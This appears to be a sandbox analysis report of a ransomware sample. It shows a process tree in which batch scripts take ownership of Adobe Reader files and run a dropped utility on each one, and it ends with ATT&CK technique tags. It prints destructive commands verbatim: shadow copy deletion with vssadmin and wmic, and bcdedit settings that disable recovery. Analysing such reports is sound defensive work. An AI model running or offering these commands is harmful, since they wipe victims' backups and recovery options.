C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:1144
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:2028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵
- Modifies file permissions
PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:1392
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:308
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵
- Modifies file permissions
PID:1764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "zx______.pfm" -nobanner3⤵PID:1344
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "zx______.pfm" -nobanner4⤵PID:1348
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:1448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵
- Modifies file permissions
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "trash.gif" -nobanner3⤵PID:1536
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "trash.gif" -nobanner4⤵PID:2000
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵
- Modifies file permissions
PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:1568
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵
- Modifies file permissions
PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:2012
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1844
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:556
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:1672
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:1308
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:1036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "can32.clx" -nobanner3⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "can32.clx" -nobanner4⤵PID:940
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:1436
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:1892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:1268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:1500
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:1344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:2024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- Modifies file permissions
PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "symbol.txt" -nobanner3⤵PID:1448
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "symbol.txt" -nobanner4⤵PID:396
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "can.hyp" -nobanner3⤵PID:1908
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "can.hyp" -nobanner4⤵PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:1900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵
- Modifies file permissions
PID:1224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:564
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:1764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵
- Modifies file permissions
PID:1428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "usa37.hyp" -nobanner3⤵PID:112
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "usa37.hyp" -nobanner4⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:668
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:1672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵
- Modifies file permissions
PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c eSOQugH2.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\eSOQugH2.exeeSOQugH2.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hGnPMHgo.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:1744
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {35A2A507-FB90-4E8C-A922-013B426A9278} S-1-5-21-2090973689-680783404-4292415065-1000:UCQFZDUI\Admin:Interactive:[1]1⤵PID:1480
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\xkHlcj4a.bat"2⤵PID:556
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:940
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2000
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1828
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:912
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1444
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Modify Registry
3